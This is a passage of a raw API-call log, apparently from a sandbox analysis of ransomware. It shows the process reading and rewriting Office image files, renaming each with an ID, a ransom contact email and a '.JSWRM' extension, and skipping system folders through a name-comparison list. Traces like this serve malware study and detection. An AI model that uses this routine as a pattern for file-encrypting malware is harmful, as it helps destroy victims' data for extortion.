lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0120.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR25F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir25f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.214] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12908) returned 1 [0120.214] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3260) returned 0x24e1d8 [0120.214] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3260, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3260, lpOverlapped=0x0) returned 1 [0120.216] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.216] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3260, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3260, lpOverlapped=0x0) returned 1 [0120.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.217] CloseHandle (hObject=0x314) returned 1 [0120.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0120.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0120.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0120.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.217] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR25F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir25f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR25F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir25f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0120.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0120.218] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2072, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR26F.GIF", cAlternateFileName="")) returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2=".") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="..") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="...") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="windows") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="recovery") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="perflogs") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="documents and settings") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="system volume information") returned 1 [0120.218] lstrcmpiW (lpString1="ZPDIR26F.GIF", lpString2="msocache") returned 1 [0120.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0120.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR26F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR26F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR26F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0120.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR26F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR26F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR26F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0120.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR26F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir26f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.220] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8306) returned 1 [0120.220] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2070) returned 0x24e1d8 [0120.220] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2070, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2070, lpOverlapped=0x0) returned 1 [0120.221] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.222] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2070, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2070, lpOverlapped=0x0) returned 1 [0120.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.222] CloseHandle (hObject=0x314) returned 1 [0120.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0120.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0120.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0120.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.222] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR26F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir26f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR26F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir26f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0120.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0120.223] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20f0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR27F.GIF", cAlternateFileName="")) returned 1 [0120.223] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2=".") returned 1 [0120.223] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="..") returned 1 [0120.223] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="...") returned 1 [0120.223] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="windows") returned 1 [0120.223] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="recovery") returned 1 [0120.223] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="perflogs") returned 1 [0120.223] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="documents and settings") returned 1 [0120.223] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.224] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="system volume information") returned 1 [0120.224] lstrcmpiW (lpString1="ZPDIR27F.GIF", lpString2="msocache") returned 1 [0120.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0120.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR27F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR27F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR27F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0120.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR27F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR27F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR27F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0120.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR27F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir27f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.225] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8432) returned 1 [0120.225] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20f0) returned 0x24e1d8 [0120.225] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x20f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x20f0, lpOverlapped=0x0) returned 1 [0120.227] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.227] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x20f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x20f0, lpOverlapped=0x0) returned 1 [0120.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.227] CloseHandle (hObject=0x314) returned 1 [0120.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0120.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0120.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0120.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0120.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0120.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0120.227] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR27F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir27f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR27F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir27f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0120.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0120.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.228] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10a3, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR28F.GIF", cAlternateFileName="")) returned 1 [0120.228] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2=".") returned 1 [0120.228] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="..") returned 1 [0120.228] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="...") returned 1 [0120.228] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="windows") returned 1 [0120.228] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="recovery") returned 1 [0120.228] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="perflogs") returned 1 [0120.228] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="documents and settings") returned 1 [0120.229] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.229] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="system volume information") returned 1 [0120.229] lstrcmpiW (lpString1="ZPDIR28F.GIF", lpString2="msocache") returned 1 [0120.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0120.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR28F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR28F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR28F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0120.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR28F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR28F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR28F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0120.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR28F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir28f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.230] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4259) returned 1 [0120.230] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10a0) returned 0x24e1d8 [0120.230] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x10a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x10a0, lpOverlapped=0x0) returned 1 [0120.245] SetFilePointer (in: hFile=0x314, 